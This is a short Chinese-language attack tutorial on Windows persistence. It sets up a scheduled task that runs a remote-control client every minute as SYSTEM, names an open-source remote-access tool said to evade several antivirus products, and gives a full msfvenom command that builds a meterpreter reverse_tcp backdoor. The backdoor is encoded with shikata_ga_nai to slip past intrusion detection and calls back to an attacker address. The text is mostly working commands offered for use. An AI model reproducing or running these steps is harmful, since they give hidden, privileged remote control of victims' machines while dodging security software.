定时任务

前提： 已获得目标系统管理员组任何一个成员权限。
命令：

schtasks /create /tn "system" /tr C:\Windows\client.exe /sc MINUTE /mo 1  /ru "System" /RL HIGHEST

命令解释：

/create =>创建任务

/tn "system"    =>指定任务名称为system

/tr C:\Windows\client.exe    =>指定程序路径

/sc MINUTE /mo 1    =>指定类型；MINUTE表示任务每n分钟运行一次，/mo 1表示每1分钟执行一次

/ru "System"    =>指定为system用户运行该任务

/RL HIGHEST    =>运行级别，HIGHEST为使用最高权限运行

远控

这里分享一款国外的开源远控，githubgithub

地址
亲测过包括360，收费版AVG，卡巴斯基在内的大多数杀软。

生成client.exe之后放到目标机器以计划任务执行。

标上线并且获取了system权限！

再来试试msf：

首先生成木马

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.52.130 LPORT=2333 -f exe > /root/Desktop/test.exe

生成后门，用shikata_ga_nai编码绕过IDS检测.

在受害机创建定时任务，msf收到回话